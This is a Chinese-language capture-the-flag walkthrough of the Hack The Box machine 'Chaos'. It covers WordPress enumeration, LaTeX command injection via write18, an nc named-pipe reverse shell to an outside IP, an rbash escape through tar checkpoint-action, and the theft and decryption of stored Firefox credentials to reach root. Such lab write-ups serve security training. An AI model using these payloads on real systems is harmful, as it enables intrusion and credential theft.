靶场攻略 | Chaos (hack the box)

2021-04-02 01:29:12 浏览数 (1)

本文作者:Twe1ve(贝塔安全实验室-核心成员)

nmap扫描结果:

80/tcp open http

|_http-title: Site doesn't have a title (text/html).

110/tcp open pop3

143/tcp open imap

|_imap-capabilities: LITERAL listed more STARTTLS ID LOGIN-REFERRALS IDLE ENABLE post-login capabilities Pre-login IMAP4rev1 OK LOGINDISABLEDA0001 have SASL-IR

|_ssl-date: TLS randomness does not represent time

10000/tcp open snet-sensor-mgmt

| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on chaos

| Not valid before: 2018-10-28T12:45:28

|_Not valid after: 2023-10-27T12:45:28

|_ssl-date: TLS randomness does not represent time

端口对应服务访问:

https://10.10.10.120:10000/ ---->webmin登录 --->默认及常规密码无效--->且错误密码过多被拒绝登录

http://10.10.10.120/wp/wordpress/ --->Wordpress网站

http://10.10.10.120/wp/wordpress/ ---> 密码保护文章

代码语言:javascript复制
wpscan --url http://10.10.10.120/wp/wordpress/ -e ap -e u
得到用户名human
WordPress version 4.9.8

使用 human 解开密码保护文章:

代码语言:javascript复制
Creds for webmail :
username – ayush
password – jiujitsu

使用evolution登录邮箱:得到提示 "You are the password";以及两个文件

python脚本内容为AES加密,解密:

https://raw.githubusercontent.com/happygirlzt/Cryptography/master/encrypt.py

代码语言:javascript复制
kali@kali:~$ python encrypt.py
Would you like to (E)ncrypt of (D)ecrypt?: 'D'
File to decrypt: 'enim_msg.txt'
Password: 'sahay'
Done.
kali@kali:~$ cat enim_msg.txt_dec
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK   --- >得到链接:http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3 --->创建PDF

test1无法生成;但是test2和test3可以

目录扫描发现:

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/doc/latex/adjustbox/ --->latex可能存在命令注入???

代码语言:javascript复制
immediatewrite18{id}

反弹shell:###由于latex对 & 等字符解析存在问题;

[方法1]需要对 & ;进行编码

[方法2]使用python反弹shell

[方法3]构造无 &符号nc payload

代码语言:javascript复制
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 0</tmp/f|nc 10.10.14.67 9999 >/tmp/f

使用前边邮箱账户密码成功登录ayush用户:---> rbash: cd: restricted

绕过rbash限制:

https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

常规方法不能绕过,最终绕过paylaod

代码语言:javascript复制
tar cf /dev/null rick.tar --checkpoint=1 --checkpoint-action=exec=/bin/bash

代码语言:javascript复制
ayush@chaos:/home$ echo $PATH
echo $PATH
/home/ayush/.app
###需要修复路径:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

用户目录下发现.mozilla文件夹。切换到该目录并开启SimpleHTTPServer,本机下载改目录下的凭证回来解开

代码语言:javascript复制
wget http://10.10.10.120:8000/ --recursive

在firefox/bzo7sjt1.default/目录中发现key4.db和logins.json

解密凭证:

https://raw.githubusercontent.com/unode/firefox_decrypt/master/firefox_decrypt.py

代码语言:javascript复制
kali@kali:~/10.10.10.120:8000/firefox/bzo7sjt1.default$ python firefox_decrypt.py  /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default
2020-04-20 06:05:13,798 - WARNING - profile.ini not found in /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default
2020-04-20 06:05:13,798 - WARNING - Continuing and assuming '/home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default' is a profile location
Master Password for profile /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default:
Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'
https shell http 网络安全 markdown

0 人点赞